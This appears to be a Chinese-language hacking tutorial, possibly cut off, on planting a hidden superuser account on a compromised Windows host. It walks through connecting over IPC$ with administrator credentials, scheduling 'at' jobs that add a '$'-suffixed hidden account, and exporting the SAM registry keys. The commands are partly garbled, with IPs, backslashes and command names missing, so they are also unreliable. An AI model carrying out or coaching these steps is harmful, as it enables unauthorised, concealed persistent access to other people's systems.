⑴超级用户是一个负责管理和维护网络的用户。这个术语在Ware网上有特殊的含义。超级用户对所有的文件卷宗、目录和文件有完全的访问权,它是安装后第一个登录到服务器上的用户。然后超级用户立即改变口令,于是没有其它用户能够访问服务器和获得超级用户无限的访问权。那么在系统中如何隐藏超级用户呢?下文中就为大家列举系统中多种隐藏超级用户方法.
⑵一、如何在命令行下远程建立隐藏的超级用户
⑶在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具svc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
⑷对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的端口,也可以用tel服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
⑸、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为...,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)
⑹、先与肉鸡建立连接,命令为: use ...ipc$ "" /user:"administrator
⑺、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的svc.exe或sc.exe来远程启动):
⑻at ... : c:winntsystem.exe user hacker$ /add
⑼建立这个加有$符的用户名,是因为加有$符后,命令行下用 user将不显示这个用户,但在帐户管理器却能看到这个用户。
⑽、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaountusers下键值:
⑾at ... : c:winntregedit.exe /e hacker.reg
⑿HKEY_LOCAL_MACHINESAMSAMDomainsaountusers
⒀/e 是regedit.exe的参数,在_LOCAL_MACHINESAMSAMDomainsaountusers这个键的一定要以结尾。必要的情况下可以用引号将“c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaountusers”引起来。